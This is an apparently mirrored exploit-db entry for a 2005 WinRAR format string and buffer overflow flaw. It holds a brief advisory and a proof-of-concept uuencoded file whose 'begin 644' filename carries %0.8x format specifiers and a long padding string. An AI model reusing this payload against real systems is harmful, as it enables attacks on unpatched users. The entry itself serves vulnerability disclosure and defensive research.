Lucene search

K
exploitdbTan Chew KeongEDB-ID:26342
HistoryOct 11, 2005 - 12:00 a.m.

RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String

2005-10-1100:00:00
Tan Chew Keong
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

EPSS

0.085

Percentile

94.6%

source: https://www.securityfocus.com/bid/15062/info

WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer.

WinRAR 3.50 and prior versions are vulnerable to these issues. 

begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end

AI Score

7.4

Confidence

Low

EPSS

0.085

Percentile

94.6%

Related for EDB-ID:26342